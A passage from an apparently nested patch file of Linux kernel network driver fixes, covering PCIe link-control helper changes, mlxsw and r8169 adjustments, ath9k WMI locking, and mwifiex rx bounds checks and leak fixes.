+ 		pci_cfg_access_lock(sdev);
+ 	}
+ 	/* PCI link toggle */
+-	err = pci_read_config_word(bridge, cap + PCI_EXP_LNKCTL, &reg16);
+-	if (err)
+-		return err;
+-	reg16 |= PCI_EXP_LNKCTL_LD;
+-	err = pci_write_config_word(bridge, cap + PCI_EXP_LNKCTL, reg16);
++	err = pcie_capability_set_word(bridge, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_LD);
+ 	if (err)
+ 		return err;
+ 	msleep(500);
+-	reg16 &= ~PCI_EXP_LNKCTL_LD;
+-	err = pci_write_config_word(bridge, cap + PCI_EXP_LNKCTL, reg16);
++	err = pcie_capability_clear_word(bridge, PCI_EXP_LNKCTL, PCI_EXP_LNKCTL_LD);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_hwmon.c b/drivers/net/ethernet/mellanox/mlxsw/core_hwmon.c
+index 70735068cf292..0fd290d776ffe 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_hwmon.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_hwmon.c
+@@ -405,7 +405,8 @@ mlxsw_hwmon_module_temp_label_show(struct device *dev,
+ 			container_of(attr, struct mlxsw_hwmon_attr, dev_attr);
+ 
+ 	return sprintf(buf, "front panel %03u\n",
+-		       mlxsw_hwmon_attr->type_index);
++		       mlxsw_hwmon_attr->type_index + 1 -
++		       mlxsw_hwmon_attr->mlxsw_hwmon_dev->sensor_count);
+ }
+ 
+ static ssize_t
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/i2c.c b/drivers/net/ethernet/mellanox/mlxsw/i2c.c
+index f5f5f8dc3d190..3beefc167da91 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/i2c.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/i2c.c
+@@ -48,6 +48,7 @@
+ #define MLXSW_I2C_MBOX_SIZE_BITS	12
+ #define MLXSW_I2C_ADDR_BUF_SIZE		4
+ #define MLXSW_I2C_BLK_DEF		32
++#define MLXSW_I2C_BLK_MAX		100
+ #define MLXSW_I2C_RETRY			5
+ #define MLXSW_I2C_TIMEOUT_MSECS		5000
+ #define MLXSW_I2C_MAX_DATA_SIZE		256
+@@ -444,7 +445,7 @@ mlxsw_i2c_cmd(struct device *dev, u16 opcode, u32 in_mod, size_t in_mbox_size,
+ 	} else {
+ 		/* No input mailbox is case of initialization query command. */
+ 		reg_size = MLXSW_I2C_MAX_DATA_SIZE;
+-		num = reg_size / mlxsw_i2c->block_size;
++		num = DIV_ROUND_UP(reg_size, mlxsw_i2c->block_size);
+ 
+ 		if (mutex_lock_interruptible(&mlxsw_i2c->cmd.lock) < 0) {
+ 			dev_err(&client->dev, "Could not acquire lock");
+@@ -653,7 +654,7 @@ static int mlxsw_i2c_probe(struct i2c_client *client,
+ 			return -EOPNOTSUPP;
+ 		}
+ 
+-		mlxsw_i2c->block_size = max_t(u16, MLXSW_I2C_BLK_DEF,
++		mlxsw_i2c->block_size = min_t(u16, MLXSW_I2C_BLK_MAX,
+ 					      min_t(u16, quirks->max_read_len,
+ 						    quirks->max_write_len));
+ 	} else {
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index cabed1b7b45ed..a9a0dca0c0305 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -5201,13 +5201,9 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	/* Disable ASPM L1 as that cause random device stop working
+ 	 * problems as well as full system hangs for some PCIe devices users.
+-	 * Chips from RTL8168h partially have issues with L1.2, but seem
+-	 * to work fine with L1 and L1.1.
+ 	 */
+ 	if (rtl_aspm_is_safe(tp))
+ 		rc = 0;
+-	else if (tp->mac_version >= RTL_GIGA_MAC_VER_46)
+-		rc = pci_disable_link_state(pdev, PCIE_LINK_STATE_L1_2);
+ 	else
+ 		rc = pci_disable_link_state(pdev, PCIE_LINK_STATE_L1);
+ 	tp->aspm_manageable = !rc;
+diff --git a/drivers/net/ethernet/sfc/ptp.c b/drivers/net/ethernet/sfc/ptp.c
+index eaef4a15008a3..692c7f132e9f9 100644
+--- a/drivers/net/ethernet/sfc/ptp.c
++++ b/drivers/net/ethernet/sfc/ptp.c
+@@ -1387,7 +1387,8 @@ static int efx_ptp_insert_multicast_filters(struct efx_nic *efx)
+ 			goto fail;
+ 
+ 		rc = efx_ptp_insert_eth_filter(efx);
+-		if (rc < 0)
++		/* Not all firmware variants support this filter */
++		if (rc < 0 && rc != -EPROTONOSUPPORT)
+ 			goto fail;
+ 	}
+ 
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 6a7965ed63001..578f470e9fad9 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -1331,8 +1331,7 @@ static struct crypto_aead *macsec_alloc_tfm(char *key, int key_len, int icv_len)
+ 	struct crypto_aead *tfm;
+ 	int ret;
+ 
+-	/* Pick a sync gcm(aes) cipher to ensure order is preserved. */
+-	tfm = crypto_alloc_aead("gcm(aes)", 0, CRYPTO_ALG_ASYNC);
++	tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
+ 
+ 	if (IS_ERR(tfm))
+ 		return tfm;
+diff --git a/drivers/net/phy/sfp-bus.c b/drivers/net/phy/sfp-bus.c
+index daac293e8edec..1865e3dbdfad0 100644
+--- a/drivers/net/phy/sfp-bus.c
++++ b/drivers/net/phy/sfp-bus.c
+@@ -254,6 +254,16 @@ void sfp_parse_support(struct sfp_bus *bus, const struct sfp_eeprom_id *id,
+ 	switch (id->base.extended_cc) {
+ 	case SFF8024_ECC_UNSPEC:
+ 		break;
++	case SFF8024_ECC_100G_25GAUI_C2M_AOC:
++		if (br_min <= 28000 && br_max >= 25000) {
++			/* 25GBASE-R, possibly with FEC */
++			__set_bit(PHY_INTERFACE_MODE_25GBASER, interfaces);
++			/* There is currently no link mode for 25000base
++			 * with unspecified range, reuse SR.
++			 */
++			phylink_set(modes, 25000baseSR_Full);
++		}
++		break;
+ 	case SFF8024_ECC_100GBASE_SR4_25GBASE_SR:
+ 		phylink_set(modes, 100000baseSR4_Full);
+ 		phylink_set(modes, 25000baseSR_Full);
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 68829a5a93d3e..4fb981b8732ef 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1422,6 +1422,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_QUIRK_SET_DTR(0x2c7c, 0x0191, 4)},	/* Quectel EG91 */
+ 	{QMI_QUIRK_SET_DTR(0x2c7c, 0x0195, 4)},	/* Quectel EG95 */
+ 	{QMI_FIXED_INTF(0x2c7c, 0x0296, 4)},	/* Quectel BG96 */
++	{QMI_QUIRK_SET_DTR(0x2c7c, 0x030e, 4)},	/* Quectel EM05GV2 */
+ 	{QMI_QUIRK_SET_DTR(0x2cb7, 0x0104, 4)},	/* Fibocom NL678 series */
+ 	{QMI_FIXED_INTF(0x0489, 0xe0b4, 0)},	/* Foxconn T77W968 LTE */
+ 	{QMI_FIXED_INTF(0x0489, 0xe0b5, 0)},	/* Foxconn T77W968 LTE with eSIM support*/
+diff --git a/drivers/net/wireless/ath/ath10k/pci.c b/drivers/net/wireless/ath/ath10k/pci.c
+index 728d607289c36..522691ba4c5d2 100644
+--- a/drivers/net/wireless/ath/ath10k/pci.c
++++ b/drivers/net/wireless/ath/ath10k/pci.c
+@@ -1963,8 +1963,9 @@ static int ath10k_pci_hif_start(struct ath10k *ar)
+ 	ath10k_pci_irq_enable(ar);
+ 	ath10k_pci_rx_post(ar);
+ 
+-	pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL,
+-				   ar_pci->link_ctl);
++	pcie_capability_clear_and_set_word(ar_pci->pdev, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_ASPMC,
++					   ar_pci->link_ctl & PCI_EXP_LNKCTL_ASPMC);
+ 
+ 	return 0;
+ }
+@@ -2821,8 +2822,8 @@ static int ath10k_pci_hif_power_up(struct ath10k *ar,
+ 
+ 	pcie_capability_read_word(ar_pci->pdev, PCI_EXP_LNKCTL,
+ 				  &ar_pci->link_ctl);
+-	pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL,
+-				   ar_pci->link_ctl & ~PCI_EXP_LNKCTL_ASPMC);
++	pcie_capability_clear_word(ar_pci->pdev, PCI_EXP_LNKCTL,
++				   PCI_EXP_LNKCTL_ASPMC);
+ 
+ 	/*
+ 	 * Bring the target up cleanly.
+diff --git a/drivers/net/wireless/ath/ath11k/pci.c b/drivers/net/wireless/ath/ath11k/pci.c
+index 3c6005ab9a717..3953ebd551bf8 100644
+--- a/drivers/net/wireless/ath/ath11k/pci.c
++++ b/drivers/net/wireless/ath/ath11k/pci.c
+@@ -582,8 +582,8 @@ static void ath11k_pci_aspm_disable(struct ath11k_pci *ab_pci)
+ 		   u16_get_bits(ab_pci->link_ctl, PCI_EXP_LNKCTL_ASPM_L1));
+ 
+ 	/* disable L0s and L1 */
+-	pcie_capability_write_word(ab_pci->pdev, PCI_EXP_LNKCTL,
+-				   ab_pci->link_ctl & ~PCI_EXP_LNKCTL_ASPMC);
++	pcie_capability_clear_word(ab_pci->pdev, PCI_EXP_LNKCTL,
++				   PCI_EXP_LNKCTL_ASPMC);
+ 
+ 	set_bit(ATH11K_PCI_ASPM_RESTORE, &ab_pci->flags);
+ }
+@@ -591,8 +591,10 @@ static void ath11k_pci_aspm_disable(struct ath11k_pci *ab_pci)
+ static void ath11k_pci_aspm_restore(struct ath11k_pci *ab_pci)
+ {
+ 	if (test_and_clear_bit(ATH11K_PCI_ASPM_RESTORE, &ab_pci->flags))
+-		pcie_capability_write_word(ab_pci->pdev, PCI_EXP_LNKCTL,
+-					   ab_pci->link_ctl);
++		pcie_capability_clear_and_set_word(ab_pci->pdev, PCI_EXP_LNKCTL,
++						   PCI_EXP_LNKCTL_ASPMC,
++						   ab_pci->link_ctl &
++						   PCI_EXP_LNKCTL_ASPMC);
+ }
+ 
+ static int ath11k_pci_power_up(struct ath11k_base *ab)
+diff --git a/drivers/net/wireless/ath/ath6kl/Makefile b/drivers/net/wireless/ath/ath6kl/Makefile
+index a75bfa9fd1cfd..dc2b3b46781e1 100644
+--- a/drivers/net/wireless/ath/ath6kl/Makefile
++++ b/drivers/net/wireless/ath/ath6kl/Makefile
+@@ -36,11 +36,6 @@ ath6kl_core-y += wmi.o
+ ath6kl_core-y += core.o
+ ath6kl_core-y += recovery.o
+ 
+-# FIXME: temporarily silence -Wdangling-pointer on non W=1+ builds
+-ifndef KBUILD_EXTRA_WARN
+-CFLAGS_htc_mbox.o += $(call cc-disable-warning, dangling-pointer)
+-endif
+-
+ ath6kl_core-$(CONFIG_NL80211_TESTMODE) += testmode.o
+ ath6kl_core-$(CONFIG_ATH6KL_TRACING) += trace.o
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_debug.c b/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
+index b3ed65e5c4da8..c55aab01fff5d 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
+@@ -491,7 +491,7 @@ int ath9k_htc_init_debug(struct ath_hw *ah)
+ 
+ 	priv->debug.debugfs_phy = debugfs_create_dir(KBUILD_MODNAME,
+ 					     priv->hw->wiphy->debugfsdir);
+-	if (!priv->debug.debugfs_phy)
++	if (IS_ERR(priv->debug.debugfs_phy))
+ 		return -ENOMEM;
+ 
+ 	ath9k_cmn_spectral_init_debug(&priv->spec_priv, priv->debug.debugfs_phy);
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index d652c647d56b5..1476b42b52a91 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -242,10 +242,10 @@ static void ath9k_wmi_ctrl_rx(void *priv, struct sk_buff *skb,
+ 		spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 		goto free_skb;
+ 	}
+-	spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 
+ 	/* WMI command response */
+ 	ath9k_wmi_rsp_callback(wmi, skb);
++	spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 
+ free_skb:
+ 	kfree_skb(skb);
+@@ -283,7 +283,8 @@ int ath9k_wmi_connect(struct htc_target *htc, struct wmi *wmi,
+ 
+ static int ath9k_wmi_cmd_issue(struct wmi *wmi,
+ 			       struct sk_buff *skb,
+-			       enum wmi_cmd_id cmd, u16 len)
++			       enum wmi_cmd_id cmd, u16 len,
++			       u8 *rsp_buf, u32 rsp_len)
+ {
+ 	struct wmi_cmd_hdr *hdr;
+ 	unsigned long flags;
+@@ -293,6 +294,11 @@ static int ath9k_wmi_cmd_issue(struct wmi *wmi,
+ 	hdr->seq_no = cpu_to_be16(++wmi->tx_seq_id);
+ 
+ 	spin_lock_irqsave(&wmi->wmi_lock, flags);
++
++	/* record the rsp buffer and length */
++	wmi->cmd_rsp_buf = rsp_buf;
++	wmi->cmd_rsp_len = rsp_len;
++
+ 	wmi->last_seq_id = wmi->tx_seq_id;
+ 	spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 
+@@ -308,8 +314,8 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 	struct ath_common *common = ath9k_hw_common(ah);
+ 	u16 headroom = sizeof(struct htc_frame_hdr) +
+ 		       sizeof(struct wmi_cmd_hdr);
++	unsigned long time_left, flags;
+ 	struct sk_buff *skb;
+-	unsigned long time_left;
+ 	int ret = 0;
+ 
+ 	if (ah->ah_flags & AH_UNPLUGGED)
+@@ -333,11 +339,7 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 		goto out;
+ 	}
+ 
+-	/* record the rsp buffer and length */
+-	wmi->cmd_rsp_buf = rsp_buf;
+-	wmi->cmd_rsp_len = rsp_len;
+-
+-	ret = ath9k_wmi_cmd_issue(wmi, skb, cmd_id, cmd_len);
++	ret = ath9k_wmi_cmd_issue(wmi, skb, cmd_id, cmd_len, rsp_buf, rsp_len);
+ 	if (ret)
+ 		goto out;
+ 
+@@ -345,7 +347,9 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 	if (!time_left) {
+ 		ath_dbg(common, WMI, "Timeout waiting for WMI command: %s\n",
+ 			wmi_cmd_to_name(cmd_id));
++		spin_lock_irqsave(&wmi->wmi_lock, flags);
+ 		wmi->last_seq_id = 0;
++		spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 		mutex_unlock(&wmi->op_mutex);
+ 		return -ETIMEDOUT;
+ 	}
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fwil_types.h b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fwil_types.h
+index f518e025d6e46..a8d88aedc4227 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fwil_types.h
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/fwil_types.h
+@@ -383,7 +383,12 @@ struct brcmf_scan_params_le {
+ 				 * fixed parameter portion is assumed, otherwise
+ 				 * ssid in the fixed portion is ignored
+ 				 */
+-	__le16 channel_list[1];	/* list of chanspecs */
++	union {
++		__le16 padding;	/* Reserve space for at least 1 entry for abort
++				 * which uses an on stack brcmf_scan_params_le
++				 */
++		DECLARE_FLEX_ARRAY(__le16, channel_list);	/* chanspecs */
++	};
+ };
+ 
+ struct brcmf_scan_results {
+diff --git a/drivers/net/wireless/marvell/mwifiex/debugfs.c b/drivers/net/wireless/marvell/mwifiex/debugfs.c
+index bda53cb91f376..63f232c723374 100644
+--- a/drivers/net/wireless/marvell/mwifiex/debugfs.c
++++ b/drivers/net/wireless/marvell/mwifiex/debugfs.c
+@@ -253,8 +253,11 @@ mwifiex_histogram_read(struct file *file, char __user *ubuf,
+ 	if (!p)
+ 		return -ENOMEM;
+ 
+-	if (!priv || !priv->hist_data)
+-		return -EFAULT;
++	if (!priv || !priv->hist_data) {
++		ret = -EFAULT;
++		goto free_and_exit;
++	}
++
+ 	phist_data = priv->hist_data;
+ 
+ 	p += sprintf(p, "\n"
+@@ -309,6 +312,8 @@ mwifiex_histogram_read(struct file *file, char __user *ubuf,
+ 	ret = simple_read_from_buffer(ubuf, count, ppos, (char *)page,
+ 				      (unsigned long)p - page);
+ 
++free_and_exit:
++	free_page(page);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/net/wireless/marvell/mwifiex/pcie.c b/drivers/net/wireless/marvell/mwifiex/pcie.c
+index 9a698a16a8f38..6697132ecc977 100644
+--- a/drivers/net/wireless/marvell/mwifiex/pcie.c
++++ b/drivers/net/wireless/marvell/mwifiex/pcie.c
+@@ -189,6 +189,8 @@ static int mwifiex_pcie_probe_of(struct device *dev)
+ }
+ 
+ static void mwifiex_pcie_work(struct work_struct *work);
++static int mwifiex_pcie_delete_rxbd_ring(struct mwifiex_adapter *adapter);
++static int mwifiex_pcie_delete_evtbd_ring(struct mwifiex_adapter *adapter);
+ 
+ static int
+ mwifiex_map_pci_memory(struct mwifiex_adapter *adapter, struct sk_buff *skb,
+@@ -792,14 +794,15 @@ static int mwifiex_init_rxq_ring(struct mwifiex_adapter *adapter)
+ 		if (!skb) {
+ 			mwifiex_dbg(adapter, ERROR,
+ 				    "Unable to allocate skb for RX ring.\n");
+-			kfree(card->rxbd_ring_vbase);
+ 			return -ENOMEM;
+ 		}
+ 
+ 		if (mwifiex_map_pci_memory(adapter, skb,
+ 					   MWIFIEX_RX_DATA_BUF_SIZE,
+-					   DMA_FROM_DEVICE))
+-			return -1;
++					   DMA_FROM_DEVICE)) {
++			kfree_skb(skb);
++			return -ENOMEM;
++		}
+ 
+ 		buf_pa = MWIFIEX_SKB_DMA_ADDR(skb);
+ 
+@@ -849,7 +852,6 @@ static int mwifiex_pcie_init_evt_ring(struct mwifiex_adapter *adapter)
+ 		if (!skb) {
+ 			mwifiex_dbg(adapter, ERROR,
+ 				    "Unable to allocate skb for EVENT buf.\n");
+-			kfree(card->evtbd_ring_vbase);
+ 			return -ENOMEM;
+ 		}
+ 		skb_put(skb, MAX_EVENT_SIZE);
+@@ -857,8 +859,7 @@ static int mwifiex_pcie_init_evt_ring(struct mwifiex_adapter *adapter)
+ 		if (mwifiex_map_pci_memory(adapter, skb, MAX_EVENT_SIZE,
+ 					   DMA_FROM_DEVICE)) {
+ 			kfree_skb(skb);
+-			kfree(card->evtbd_ring_vbase);
+-			return -1;
++			return -ENOMEM;
+ 		}
+ 
+ 		buf_pa = MWIFIEX_SKB_DMA_ADDR(skb);
+@@ -1058,6 +1059,7 @@ static int mwifiex_pcie_delete_txbd_ring(struct mwifiex_adapter *adapter)
+  */
+ static int mwifiex_pcie_create_rxbd_ring(struct mwifiex_adapter *adapter)
+ {
++	int ret;
+ 	struct pcie_service_card *card = adapter->card;
+ 	const struct mwifiex_pcie_card_reg *reg = card->pcie.reg;
+ 
+@@ -1096,7 +1098,10 @@ static int mwifiex_pcie_create_rxbd_ring(struct mwifiex_adapter *adapter)
+ 		    (u32)((u64)card->rxbd_ring_pbase >> 32),
+ 		    card->rxbd_ring_size);
+ 
+-	return mwifiex_init_rxq_ring(adapter);
++	ret = mwifiex_init_rxq_ring(adapter);
++	if (ret)
++		mwifiex_pcie_delete_rxbd_ring(adapter);
++	return ret;
+ }
+ 
+ /*
+@@ -1127,6 +1132,7 @@ static int mwifiex_pcie_delete_rxbd_ring(struct mwifiex_adapter *adapter)
+  */
+ static int mwifiex_pcie_create_evtbd_ring(struct mwifiex_adapter *adapter)
+ {
++	int ret;
+ 	struct pcie_service_card *card = adapter->card;
+ 	const struct mwifiex_pcie_card_reg *reg = card->pcie.reg;
+ 
+@@ -1161,7 +1167,10 @@ static int mwifiex_pcie_create_evtbd_ring(struct mwifiex_adapter *adapter)
+ 		    (u32)((u64)card->evtbd_ring_pbase >> 32),
+ 		    card->evtbd_ring_size);
+ 
+-	return mwifiex_pcie_init_evt_ring(adapter);
++	ret = mwifiex_pcie_init_evt_ring(adapter);
++	if (ret)
++		mwifiex_pcie_delete_evtbd_ring(adapter);
++	return ret;
+ }
+ 
+ /*
+diff --git a/drivers/net/wireless/marvell/mwifiex/sta_rx.c b/drivers/net/wireless/marvell/mwifiex/sta_rx.c
+index 13659b02ba882..65420ad674167 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sta_rx.c
++++ b/drivers/net/wireless/marvell/mwifiex/sta_rx.c
+@@ -86,6 +86,15 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv,
+ 	rx_pkt_len = le16_to_cpu(local_rx_pd->rx_pkt_length);
+ 	rx_pkt_hdr = (void *)local_rx_pd + rx_pkt_off;
+ 
++	if (sizeof(*rx_pkt_hdr) + rx_pkt_off > skb->len) {
++		mwifiex_dbg(priv->adapter, ERROR,
++			    "wrong rx packet offset: len=%d, rx_pkt_off=%d\n",
++			    skb->len, rx_pkt_off);
++		priv->stats.rx_dropped++;
++		dev_kfree_skb_any(skb);
++		return -1;
++	}
++
+ 	if ((!memcmp(&rx_pkt_hdr->rfc1042_hdr, bridge_tunnel_header,
+ 		     sizeof(bridge_tunnel_header))) ||
+ 	    (!memcmp(&rx_pkt_hdr->rfc1042_hdr, rfc1042_header,
+@@ -194,7 +203,8 @@ int mwifiex_process_sta_rx_packet(struct mwifiex_private *priv,
+ 
+ 	rx_pkt_hdr = (void *)local_rx_pd + rx_pkt_offset;
+ 
+-	if ((rx_pkt_offset + rx_pkt_length) > (u16) skb->len) {
++	if ((rx_pkt_offset + rx_pkt_length) > skb->len ||
++	    sizeof(rx_pkt_hdr->eth803_hdr) + rx_pkt_offset > skb->len) {
+ 		mwifiex_dbg(adapter, ERROR,
+ 			    "wrong rx packet: len=%d, rx_pkt_offset=%d, rx_pkt_length=%d\n",
+ 			    skb->len, rx_pkt_offset, rx_pkt_length);
+diff --git a/drivers/net/wireless/marvell/mwifiex/uap_txrx.c b/drivers/net/wireless/marvell/mwifiex/uap_txrx.c
+index e495f7eaea033..b8b9a0fcb19cd 100644
+--- a/drivers/net/wireless/marvell/mwifiex/uap_txrx.c
++++ b/drivers/net/wireless/marvell/mwifiex/uap_txrx.c
+@@ -103,6 +103,16 @@ static void mwifiex_uap_queue_bridged_pkt(struct mwifiex_private *priv,
+ 		return;
+ 	}
+ 
++	if (sizeof(*rx_pkt_hdr) +
++	    le16_to_cpu(uap_rx_pd->rx_pkt_offset) > skb->len) {
++		mwifiex_dbg(adapter, ERROR,
++			    "wrong rx packet offset: len=%d,rx_pkt_offset=%d\n",
++			    skb->len, le16_to_cpu(uap_rx_pd->rx_pkt_offset));
++		priv->stats.rx_dropped++;
++		dev_kfree_skb_any(skb);
++		return;
++	}
++
+ 	if ((!memcmp(&rx_pkt_hdr->rfc1042_hdr, bridge_tunnel_header,
+ 		     sizeof(bridge_tunnel_header))) ||
+ 	    (!memcmp(&rx_pkt_hdr->rfc1042_hdr, rfc1042_header,
+@@ -243,7 +253,15 @@ int mwifiex_handle_uap_rx_forward(struct mwifiex_private *priv,
+ 
+ 	if (is_multicast_ether_addr(ra)) {
+ 		skb_uap = skb_copy(skb, GFP_ATOMIC);
+-		mwifiex_uap_queue_bridged_pkt(priv, skb_uap);
++		if (likely(skb_uap)) {
++			mwifiex_uap_queue_bridged_pkt(priv, skb_uap);
++		} else {
++			mwifiex_dbg(adapter, ERROR,
++				    "failed to copy skb for uAP\n");
++			priv->stats.rx_dropped++;
++			dev_kfree_skb_any(skb);
++			return -1;
++		}
+ 	} else {
+ 		if (mwifiex_get_sta_entry(priv, ra)) {
+ 			/* Requeue Intra-BSS packet */
+@@ -367,6 +385,16 @@ int mwifiex_process_uap_rx_packet(struct mwifiex_private *priv,
+ 	rx_pkt_type = le16_to_cpu(uap_rx_pd->rx_pkt_type);
+ 	rx_pkt_hdr = (void *)uap_rx_pd + le16_to_cpu(uap_rx_pd->rx_pkt_offset);
+ 
++	if (le16_to_cpu(uap_rx_pd->rx_pkt_offset) +
++	    sizeof(rx_pkt_hdr->eth803_hdr) > skb->len) {
++		mwifiex_dbg(adapter, ERROR,
++			    "wrong rx packet for struct ethhdr: len=%d, offset=%d\n",
++			    skb->len, le16_to_cpu(uap_rx_pd->rx_pkt_offset));
++		priv->stats.rx_dropped++;
++		dev_kfree_skb_any(skb);
++		return 0;
++	}
++
+ 	ether_addr_copy(ta, rx_pkt_hdr->eth803_hdr.h_source);
+ 
+ 	if ((le16_to_cpu(uap_rx_pd->rx_pkt_offset) +
+diff --git a/drivers/net/wireless/marvell/mwifiex/util.c b/drivers/net/wireless/marvell/mwifiex/util.c
+index 94c2d219835da..745b1d925b217 100644
+--- a/drivers/net/wireless/marvell/mwifiex/util.c
++++ b/drivers/net/wireless/marvell/mwifiex/util.c
+@@ -393,11 +393,15 @@ mwifiex_process_mgmt_packet(struct mwifiex_private *priv,
+ 	}
+ 
+ 	rx_pd = (struct rxpd *)skb->data;
++	pkt_len = le16_to_cpu(rx_pd->rx_pkt_length);
++	if (pkt_len < sizeof(struct ieee80211_hdr) + sizeof(pkt_len)) {
++		mwifiex_dbg(priv->adapter, ERROR, "invalid rx_pkt_length");
++		return -1;
++	}
+ 
+ 	skb_pull(skb, le16_to_cpu(rx_pd->rx_pkt_offset));
+ 	skb_pull(skb, sizeof(pkt_len));
+-
+-	pkt_len = le16_to_cpu(rx_pd->rx_pkt_length);
++	pkt_len -= sizeof(pkt_len);
+ 
+ 	ieee_hdr = (void *)skb->data;
+ 	if (ieee80211_is_mgmt(ieee_hdr->frame_control)) {
+@@ -410,7 +414,7 @@ mwifiex_process_mgmt_packet(struct mwifiex_private *priv,
+ 		skb->data + sizeof(struct ieee80211_hdr),
+ 		pkt_len - sizeof(struct ieee80211_hdr));
+ 
+-	pkt_len -= ETH_ALEN + sizeof(pkt_len);
++	pkt_len -= ETH_ALEN;
+ 	rx_pd->rx_pkt_length = cpu_to_le16(pkt_len);
+ 
+ 	cfg80211_rx_mgmt(&priv->wdev, priv->roc_cfg.chan.center_freq,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index bda26bd62412e..3280843ea8566 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -455,7 +455,8 @@ static int mt7915_config(struct ieee80211_hw *hw, u32 changed)
+ 		ieee80211_wake_queues(hw);
+ 	}
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_POWER) {
++	if (changed & (IEEE80211_CONF_CHANGE_POWER |
++		       IEEE80211_CONF_CHANGE_CHANNEL)) {
+ 		ret = mt7915_mcu_set_txpower_sku(phy);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/init.c b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+index 4ad66b3443838..c997b8d3ea590 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+@@ -80,7 +80,8 @@ mt7921_init_wiphy(struct ieee80211_hw *hw)
+ 	wiphy->max_sched_scan_ssids = MT76_CONNAC_MAX_SCHED_SCAN_SSID;
+ 	wiphy->max_match_sets = MT76_CONNAC_MAX_SCAN_MATCH;
+ 	wiphy->max_sched_scan_reqs = 1;
+-	wiphy->flags |= WIPHY_FLAG_HAS_CHANNEL_SWITCH;
++	wiphy->flags |= WIPHY_FLAG_HAS_CHANNEL_SWITCH |
++			WIPHY_FLAG_SPLIT_SCAN_6GHZ;
+ 	wiphy->reg_notifier = mt7921_regd_notifier;
+ 
+ 	wiphy->features |= NL80211_FEATURE_SCHED_SCAN_RANDOM_MAC_ADDR |
+diff --git a/drivers/net/wireless/mediatek/mt76/testmode.c b/drivers/net/wireless/mediatek/mt76/testmode.c
+index 0accc71a91c9a..4644dace9bb34 100644
+--- a/drivers/net/wireless/mediatek/mt76/testmode.c
++++ b/drivers/net/wireless/mediatek/mt76/testmode.c
+@@ -8,6 +8,7 @@ const struct nla_policy mt76_tm_policy[NUM_MT76_TM_ATTRS] = {
+ 	[MT76_TM_ATTR_RESET] = { .type = NLA_FLAG },
+ 	[MT76_TM_ATTR_STATE] = { .type = NLA_U8 },
+ 	[MT76_TM_ATTR_TX_COUNT] = { .type = NLA_U32 },
++	[MT76_TM_ATTR_TX_LENGTH] = { .type = NLA_U32 },
+ 	[MT76_TM_ATTR_TX_RATE_MODE] = { .type = NLA_U8 },
+ 	[MT76_TM_ATTR_TX_RATE_NSS] = { .type = NLA_U8 },
+ 	[MT76_TM_ATTR_TX_RATE_IDX] = { .type = NLA_U8 },
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index ec0af903961f0..3a8fe60d0bb7b 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -2302,12 +2302,14 @@ static ssize_t rtw89_debug_priv_btc_manual_set(struct file *filp,
+ 	struct rtw89_dev *rtwdev = debugfs_priv->rtwdev;
+ 	struct rtw89_btc *btc = &rtwdev->btc;
+ 	bool btc_manual;
++	int ret;
+ 
+-	if (kstrtobool_from_user(user_buf, count, &btc_manual))
+-		goto out;
